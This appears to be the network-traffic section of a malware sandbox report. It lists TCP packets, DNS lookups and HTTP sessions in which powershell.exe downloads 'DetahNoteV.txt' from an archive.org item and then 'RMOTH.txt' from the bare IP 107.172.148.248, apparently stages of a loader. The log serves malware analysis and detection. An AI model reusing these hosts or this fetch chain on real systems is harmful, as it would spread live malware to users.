                                              Oct 2, 2024 05:23:18.627684116 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.627702951 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.627743959 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.627751112 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.627772093 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.627799988 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.628343105 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.628361940 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.628437042 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.628437042 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.628447056 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.628509045 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.659039021 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.659058094 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.659295082 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.659318924 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.659411907 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.680182934 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.680200100 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.680449009 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.680494070 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.680619001 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.693382025 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.693398952 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.693550110 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.693613052 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.693692923 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.712152004 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.712172031 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.712326050 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.712362051 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.712558985 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.712616920 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.712631941 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.712753057 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.712760925 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.712821007 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.712986946 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713006020 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713058949 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.713068008 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713093042 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.713148117 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.713458061 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713475943 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713517904 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.713526964 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713663101 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.713934898 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713948965 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.713985920 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.713993073 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.714015007 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.714085102 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.756189108 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.756207943 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.756407022 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.756442070 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.756510019 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.779807091 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.779824972 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.779917955 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.779942989 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.780041933 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.798686028 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.798702955 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.798779011 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.798799038 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.798873901 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.798932076 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.798949957 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799114943 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.799124956 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799196005 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.799436092 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799453020 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799515009 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.799523115 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799591064 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.799866915 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799881935 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.799948931 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.799957037 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800013065 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.800177097 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800193071 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800244093 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.800251961 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800322056 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.800462961 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800477982 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800539970 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.800546885 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.800594091 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.842884064 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.842900038 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.842994928 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.843022108 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.843070984 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.866666079 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.866683960 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.866851091 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.866884947 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.867033005 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.885384083 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.885400057 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.885543108 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.885580063 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.885632992 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.885731936 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.885747910 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.885854959 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.885864019 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886034966 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886148930 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886171103 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886204958 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886215925 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886249065 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886288881 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886635065 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886651039 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886701107 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886708975 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886800051 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886888981 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886909008 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.886967897 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886967897 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.886976957 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.887057066 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.887322903 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.887340069 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.887409925 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.887418985 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.887476921 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.929575920 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.929608107 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.929786921 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.929817915 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.929939032 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.953598976 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.953629017 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.953896999 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.953927994 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.954667091 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.972182035 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.972210884 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.972397089 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.972415924 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.972440958 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.972464085 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.972518921 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.972917080 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.972935915 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973000050 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.973010063 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973026037 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.973251104 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973272085 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973306894 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.973315954 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973349094 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.973730087 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973747015 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973809004 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.973819971 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.973833084 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.973978996 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.974000931 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.974034071 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.974042892 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.974072933 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.016139984 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.016165018 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.016254902 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.016285896 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.040153027 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.040184021 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.040278912 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.040293932 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.040342093 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.058880091 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754034042 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754075050 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754082918 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754106045 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754137039 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754336119 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754354954 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754389048 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754396915 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754424095 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754446030 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754601955 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754620075 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754678965 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754686117 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754723072 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.796844006 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.796866894 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.796974897 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.796997070 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.797035933 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.820693970 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.820713997 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.820784092 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.820801020 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.820842981 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839771986 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839804888 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839880943 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839895964 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839931965 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839941025 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839947939 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839966059 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839987040 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839994907 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840018988 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840039015 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840471983 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840497017 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840542078 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840549946 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840586901 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840795994 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840812922 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840857983 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840864897 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840897083 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841085911 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841108084 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841154099 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841162920 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841192007 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841614008 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841634989 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841682911 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841691971 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841722012 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.883368015 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.883464098 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.883506060 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.883531094 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.883546114 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.883563995 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.907289028 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.907313108 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.907444000 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.907484055 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.907521009 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927023888 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927042007 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927145958 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927169085 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927202940 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927459955 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927474976 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927519083 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927526951 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927560091 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927793980 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927810907 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927848101 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927855968 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927881002 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927897930 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928277016 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928291082 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928354025 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928364038 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928394079 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928644896 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928659916 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928688049 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928694963 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928716898 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928735018 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.929044962 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.929061890 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.929094076 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.929100037 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.929126978 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.965979099 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.966067076 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.966079950 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.966114998 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.968612909 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:20.129364014 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:20.134154081 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:20.134238005 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:20.134309053 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:20.139081001 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.503258944 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.503371954 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.509891987 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.510379076 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.514661074 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.515144110 CEST8049712107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.515219927 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.515352964 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.520087957 CEST8049712107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:24:02.878681898 CEST8049712107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:24:02.878756046 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:24:02.878839016 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:24:02.883606911 CEST8049712107.172.148.248192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 05:23:16.925757885 CEST | 56345 | 53 | 192.168.2.11 | 1.1.1.1
Oct 2, 2024 05:23:17.073657036 CEST | 53 | 56345 | 1.1.1.1 | 192.168.2.11
Oct 2, 2024 05:23:45.364411116 CEST | 53 | 58736 | 162.159.36.2 | 192.168.2.11
Oct 2, 2024 05:23:45.864664078 CEST | 49665 | 53 | 192.168.2.11 | 1.1.1.1
Oct 2, 2024 05:23:45.871864080 CEST | 53 | 49665 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 05:23:16.925757885 CEST | 192.168.2.11 | 1.1.1.1 | 0x1c0c | Standard query (0) | ia600100.us.archive.org | A (IP address) | IN (0x0001) | false
Oct 2, 2024 05:23:45.864664078 CEST | 192.168.2.11 | 1.1.1.1 | 0xf00b | Standard query (0) | 241.42.69.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 05:23:17.073657036 CEST | 1.1.1.1 | 192.168.2.11 | 0x1c0c | No error (0) | ia600100.us.archive.org |  | 207.241.227.240 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 05:23:45.871864080 CEST | 1.1.1.1 | 192.168.2.11 | 0xf00b | Name error (3) | 241.42.69.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                              • ia600100.us.archive.org
                                              • 107.172.148.248
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49706 | 107.172.148.248 | 80 | 7744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 05:23:20.134309053 CEST | 78 | OUT | GET /130/RMOTH.txt HTTP/1.1
Host: 107.172.148.248
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49712 | 107.172.148.248 | 80 | 7744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 05:23:41.515352964 CEST | 78 | OUT | GET /130/RMOTH.txt HTTP/1.1
Host: 107.172.148.248
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49705 | 207.241.227.240 | 443 | 7744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 03:23:17 UTC | 109 | OUT | GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
Host: ia600100.us.archive.org
Connection: Keep-Alive
2024-10-02 03:23:17 UTC | 606 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
